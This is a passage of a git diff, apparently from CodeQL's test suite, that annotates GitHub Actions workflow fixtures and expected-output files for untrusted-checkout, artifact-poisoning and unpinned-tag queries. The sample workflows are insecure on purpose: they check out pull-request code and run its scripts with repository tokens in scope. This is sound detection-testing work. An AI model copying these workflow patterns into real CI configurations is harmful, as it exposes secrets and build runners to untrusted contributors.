b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml index cc7f71a7b3e..afbb3f0a433 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test29.yml 
@@ -11,11 +11,11 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} fetch-depth: 0 - - uses: actions/github-script@v5 + - uses: actions/github-script@v5 # $ Alert[actions/untrusted-checkout/critical] with: github-token: ${{secrets.GITHUB_TOKEN}} script: | const { foo } = require('./foo'); - + # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml index d9aa2973e00..8c45b9f8930 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test3.yml @@ -30,7 +30,7 @@ jobs: with: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - run: npm install + - run: npm install # $ Alert[actions/untrusted-checkout/medium] working-directory: scripts/github-actions/semantic-pull-request/ - name: Lint PR Title if: github.event_name == 'pull_request_target' diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml index f82f493cd6e..5d143bb3f85 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test4.yml @@ -22,7 +22,7 @@ jobs: ref: ${{ github.event.pull_request.head.ref }} repository: ${{ github.event.pull_request.head.repo.full_name }} - - name: Checkout + - name: Checkout # $ Alert[actions/untrusted-checkout/medium] if: ${{ github.event_name != 'pull_request_target' }} uses: actions/checkout@v3 with: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml index 7a346a897e4..99b3c1d4900 100644 
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml
@@ -21,8 +21,8 @@ jobs: persist-credentials: false ref: refs/pull/${{ github.event.issue.number }}/head - - name: Setup PNPM - uses: pnpm/action-setup@v3 + - name: Setup PNPM # $ Alert[actions/untrusted-checkout/critical] + uses: pnpm/action-setup@v3 # $ Alert[actions/unpinned-tag] - name: Setup Node uses: actions/setup-node@v4
@@ -33,10 +33,10 @@ jobs: - name: Install dependencies run: pnpm install - - name: Build Packages + - name: Build Packages # $ Sink[actions/untrusted-checkout/critical] run: pnpm run build - - name: Get bench command + - name: Get bench command # $ Sink[actions/untrusted-checkout/critical] id: bench-command env: # protects from untrusted user input and command injection
@@ -56,5 +56,5 @@ jobs: echo "$processed" >> $GITHUB_OUTPUT echo "BENCHEOF" >> $GITHUB_OUTPUT shell: bash - - run: python2.7 foo.py - - run: pip install --no-deps . + - run: python2.7 foo.py # $ Sink[actions/untrusted-checkout/critical] + - run: pip install --no-deps . # $ Sink[actions/untrusted-checkout/critical]
diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml
index 381cc16a6d1..bb28d082ac5 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test8.yml
@@ -23,7 +23,7 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} fetch-depth: 0 - - name: Generate openapi.json + - name: Generate openapi.json # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] run: dotnet test tests/Jellyfin.Server.Integration.Tests/Jellyfin.Server.Integration.Tests.csproj -c Release --filter "Jellyfin.Server.Integration.Tests.OpenApiSpecTests" publish-unstable: diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml index 6f7ff665be3..2c8007b9984 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/test9.yml @@ -13,6 +13,6 @@ jobs: ref: ${{ github.event.pull_request.head.sha }} repository: ${{ github.event.pull_request.head.repo.full_name }} fetch-depth: 0 - - run: + - run: # $ Alert[actions/untrusted-checkout/medium] Alert[actions/unversioned-immutable-action] sed -f script/config foo.md > bar.md diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml index 6e7612144bc..eef43d011d4 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/unpinned_tags.yml 
@@ -7,13 +7,13 @@ jobs: runs-on: ubuntu-latest steps: - uses: foo/bar - - uses: foo/bar@v1 + - uses: foo/bar@v1 # $ Alert[actions/unpinned-tag] - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb - - uses: docker://foo/bar@latest + - uses: docker://foo/bar@latest # $ Alert[actions/unpinned-tag] - uses: docker://foo/bar@sha256:887a259a5a534f3c4f36cb02dca341673c6089431057242cdc931e9f133147e9 # SHA-256 pinned (64 hex chars) - should NOT be flagged - uses: foo/bar@25b062c917b0c75f8b47d8469aff6c94ffd89abb25b062c917b0c75f8b47d84d # SHA-1 pinned (40 hex chars) regression - should NOT be flagged - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2 # Invalid 50-char hex string - should be flagged - - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2a1b2c3d4e5 + - uses: foo/bar@a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4e5f6a1b2a1b2c3d4e5 # $ Alert[actions/unpinned-tag] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml index 15d4813c40e..5119b7384ea 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout.yml @@ -8,14 +8,14 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.pull_request.head.sha }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install npm run lint - test2: + test2: # $ Sink[actions/untrusted-checkout/critical] runs-on: ubuntu-latest env: HEAD: ${{ github.event.pull_request.head.sha }} 
@@ -23,10 +23,10 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ env.HEAD }} - - name: Setup Node.js + - name: Setup Node.js # $ Alert[actions/untrusted-checkout/critical] uses: actions/setup-node@v4 with: node-version: 21 - run: | npm install - npm run lint + npm run lint # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml index 47a0dfc6bd3..644738a7605 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout2.yml @@ -16,4 +16,4 @@ jobs: env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} run: | - gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} + gh pr checkout ${{ needs.should_run_it.outputs.pr_number }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml index 0a38be8b12b..1001c854978 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout3.yml @@ -10,4 +10,4 @@ jobs: steps: - uses: actions/checkout@v4 - uses: ./.github/actions/dangerous-git-checkout - - run: yarn test + - run: yarn test # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml index 7e154502c13..f0622820787 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/untrusted_checkout4.yml 
@@ -32,20 +32,20 @@ jobs: repository: ${{ fromJSON(steps.get-pr.outputs.result).head.repo.full_name }} ref: ${{ fromJSON(steps.get-pr.outputs.result).head.ref }} - - name: Update version minor + - name: Update version minor # $ Alert[actions/untrusted-checkout/critical] if: contains(github.event.comment.body, '/version minor') run: | ./version.sh -u -n echo "BUMP_TYPE=minor" >> $GITHUB_ENV - - name: Update version major + - name: Update version major # $ Sink[actions/untrusted-checkout/critical] if: contains(github.event.comment.body, '/version major') run: | ./version.sh -u -m echo "BUMP_TYPE=major" >> $GITHUB_ENV - - name: Update version patch + - name: Update version patch # $ Sink[actions/untrusted-checkout/critical] if: contains(github.event.comment.body, '/version patch') run: | ./version.sh -u -p - echo "BUMP_TYPE=patch" >> $GITHUB_ENV + echo "BUMP_TYPE=patch" >> $GITHUB_ENV # $ Sink[actions/untrusted-checkout/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml index c802355d102..145cb77b829 100644 --- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml +++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout.yml @@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.workflow_run.head.sha }} - - uses: actions/checkout@v2 + - uses: actions/checkout@v2 # $ Alert[actions/untrusted-checkout/high] with: - ref: ${{ env.HEAD }} + ref: ${{ env.HEAD }} # $ Alert[actions/untrusted-checkout/high] diff --git a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml index bcde60f55cb..3cbd9d698dd 100644 
--- a/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml
+++ b/actions/ql/test/query-tests/Security/CWE-829/.github/workflows/workflow_run_untrusted_checkout_2.yml
@@ -13,7 +13,7 @@ jobs: - uses: actions/checkout@v2 with: ref: ${{ github.event.workflow_run.head.sha }} - - uses: actions/checkout@v2 + - uses: actions/checkout@v2 # $ Alert[actions/untrusted-checkout/high] with: - ref: ${{ env.HEAD }} + ref: ${{ env.HEAD }} # $ Alert[actions/untrusted-checkout/high]
diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
index 3c5f6bf93e9..df0776a8b0f 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
+++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.expected
@@ -1,3 +1,22 @@ +#select +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | +| .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:18:14:18:24 | npm install | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning96.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run | edges | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config | 
@@ -54,22 +73,3 @@ nodes | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths -#select -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning11.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:25 | python foo/x.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning12.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning21.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning22.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning31.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning32.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning33.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning34.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning41.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning42.yml:4:3:4:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:9:9:16:6 | Uses Step | .github/workflows/artifactpoisoning71.yml:17:14:18:40 | sed -f config foo.md > bar.md\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning71.yml:4:5:4:16 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:28:9:31:6 | Uses Step | .github/workflows/artifactpoisoning81.yml:31:14:31:27 | python test.py | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning81.yml:3:5:3:23 | pull_request_target | pull_request_target | -| .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning96.yml:18:14:18:24 | npm install | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/artifactpoisoning96.yml:2:3:2:14 | workflow_run | workflow_run | -| .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:10:9:16:6 | Uses Step | .github/workflows/artifactpoisoning101.yml:17:14:19:59 | PR_NUMBER=$(./get_pull_request_number.sh pr_number.txt)\necho "PR_NUMBER=$PR_NUMBER" >> $GITHUB_OUTPUT \n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). 
| .github/workflows/artifactpoisoning101.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:12:15:33:12 | Uses Step | .github/workflows/test18.yml:36:15:40:58 | Uses Step | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test18.yml:3:5:3:16 | workflow_run | workflow_run | -| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | Potential artifact poisoning; the artifact being consumed has contents that may be controlled by an external user ($@). | .github/workflows/test25.yml:2:3:2:14 | workflow_run | workflow_run |
diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref
index 4f8d2af04e8..2f71173a891 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningCritical.qlref
@@ -1,2 +1,2 @@
-Security/CWE-829/ArtifactPoisoningCritical.ql
-
+query: Security/CWE-829/ArtifactPoisoningCritical.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected
index c0c52e47f5b..ef09155ec63 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected
+++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.expected
@@ -1,3 +1,4 @@
+#select edges | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | provenance | Config | | .github/actions/download-artifact-2/action.yaml:6:7:25:4 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:14:29:26 | make snapshot | provenance | Config |
@@ -54,4 +55,3 @@ nodes
| .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | semmle.label | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:39:14:40:45 | ./gradlew buildScanPublishPrevious\n | semmle.label | ./gradlew buildScanPublishPrevious\n | subpaths -#select
diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref
index 39548f27412..177e1b08095 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningMedium.qlref
@@ -1,2 +1,2 @@
-Security/CWE-829/ArtifactPoisoningMedium.ql
-
+query: Security/CWE-829/ArtifactPoisoningMedium.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref
index 17a2059f7e9..4f3bbb90c2a 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-829/ArtifactPoisoningPathTraversal.qlref
@@ -1,2 +1,2 @@
-experimental/Security/CWE-829/ArtifactPoisoningPathTraversal.ql
-
+query: experimental/Security/CWE-829/ArtifactPoisoningPathTraversal.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref
index 8c9db66bf6b..ce9ebe84e53 100644
--- a/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref
+++ b/actions/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.qlref
@@ -1 +1,2 @@
-Security/CWE-829/UnpinnedActionsTag.ql
+query: Security/CWE-829/UnpinnedActionsTag.ql
+postprocess: utils/test/InlineExpectationsTestQuery.ql
diff --git a/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/actions/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected
index 52fcecfb9ed..6f478cfcb14 100644
